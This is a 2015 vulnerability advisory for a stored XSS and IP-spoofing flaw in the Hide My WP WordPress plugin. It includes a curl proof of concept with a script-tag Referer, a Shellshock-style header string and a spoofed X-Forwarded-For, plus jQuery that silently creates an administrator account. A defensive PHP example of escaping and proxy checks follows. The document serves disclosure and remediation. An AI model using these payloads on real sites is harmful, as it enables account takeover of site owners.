[WP] Hide My WP XSS vulnerability
Exploit Title: Hide My WP XSS vulnerability
Date: 20-07-2015
Software Link: http://codecanyon.net/item/hide-my-wp-no-one-can-know-you-use-wordpress/4177158
Version 4.51.1
Google dork: ff957fea/includes/css/style.css
Fix: turn off IDS logging
Description
An attacker can make a fake attack attempt, which is logged, and inject JavaScript into the resulting log entry. The attacker can also spoof their IP address in the logs.
Proof of Concept
curl --referer '<script src="//….">  // () { :; };' --header 'X-FORWARDED-FOR: 8.8.8.8' http://example.com
The site's owner will receive a notification about the fake attack attempt; when they view it in the logs, the included JavaScript runs in their browser. The attacker can create an admin user in the background with the example JS below.
// Example JS to create an admin user:
jQuery('body').prepend('<iframe id="test" style="position:absolute;top:-10000px" src="/wp-admin/user-new.php"></iframe>');
jQuery('#test').load(function(){
jQuery('#test').contents().find('#user_login').val('pwned');
jQuery('#test').contents().find('#email').val('[email protected]');
// Prevent browser prompt "remember password"
jQuery('#test').contents().find('#pass1').attr('type','text');
jQuery('#test').contents().find('#pass2').attr('type','text');
jQuery('#role').val('administrator');
jQuery('#test').contents().find('#pass1').val('dummypass');
jQuery('#test').contents().find('#pass2').val('dummypass');
jQuery('#test').contents().find('#createuser').submit();
});
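The two root causes in the advisory are a log viewer that renders the stored Referer without HTML escaping, and a logger that takes the client IP from X-Forwarded-For regardless of who sent it. The following is an added example, not the plugin's code, showing how an attack-log feature should handle both: escape every attacker-controlled field on output, and honour X-Forwarded-For only when the TCP peer is one of your own reverse proxies. The TRUSTED_PROXIES address, the function names and the constructed request are assumptions for illustration.

```php
<?php
// Added example (not Hide My WP's code): safe handling of request fields in an
// IDS/attack log. Assumes a single reverse proxy that appends the client IP
// as the last X-Forwarded-For entry; adjust TRUSTED_PROXIES for your setup.

/** Hypothetical address of our own reverse proxy. */
const TRUSTED_PROXIES = ['10.0.0.5'];

/**
 * Decide which IP to log. X-Forwarded-For is client-controlled, so it is used
 * only when the direct peer is a trusted proxy; otherwise REMOTE_ADDR wins.
 */
function client_ip(array $server): string {
    $peer = $server['REMOTE_ADDR'] ?? '0.0.0.0';
    if (in_array($peer, TRUSTED_PROXIES, true) && !empty($server['HTTP_X_FORWARDED_FOR'])) {
        // The rightmost entry was appended by our proxy; earlier ones may be forged.
        $chain = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR']));
        $candidate = end($chain);
        if (filter_var($candidate, FILTER_VALIDATE_IP)) {
            return $candidate;
        }
    }
    return $peer;
}

/** Build one log record; values are stored raw and escaped only when rendered. */
function ids_log_entry(array $server): array {
    return [
        'time'    => gmdate('c'),
        'ip'      => client_ip($server),
        'referer' => $server['HTTP_REFERER'] ?? '',
        'uri'     => $server['REQUEST_URI'] ?? '',
    ];
}

/** Render log rows for the admin page. Every cell is HTML-escaped. */
function render_log_rows(array $entries): string {
    $html = '';
    foreach ($entries as $e) {
        $cells = array_map(
            fn($v) => htmlspecialchars((string)$v, ENT_QUOTES | ENT_HTML5, 'UTF-8'),
            [$e['time'], $e['ip'], $e['referer'], $e['uri']]
        );
        $html .= '<tr><td>' . implode('</td><td>', $cells) . "</td></tr>\n";
    }
    return $html;
}

// Constructed request shaped like the advisory's PoC: a script tag in the
// Referer and a spoofed X-Forwarded-For, arriving directly from the attacker
// rather than through the trusted proxy.
$fake = [
    'REMOTE_ADDR'          => '203.0.113.7',
    'HTTP_X_FORWARDED_FOR' => '8.8.8.8',
    'HTTP_REFERER'         => '<script src="//attacker.invalid/x.js"></script>',
    'REQUEST_URI'          => '/?q=() { :; };',
];

$entry = ids_log_entry($fake);
echo render_log_rows([$entry]);
// The row records 203.0.113.7 (the real peer, not 8.8.8.8) and the Referer
// appears as &lt;script ...&gt; text, so the admin's browser displays the
// payload instead of executing it.
```

In a WordPress plugin the escaping step would normally go through esc_html() at the point of output; the behaviour is the same as htmlspecialchars() here. The advisory's suggested workaround (disabling IDS logging) removes the sink entirely, whereas output escaping keeps the log useful while making the stored payload inert.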
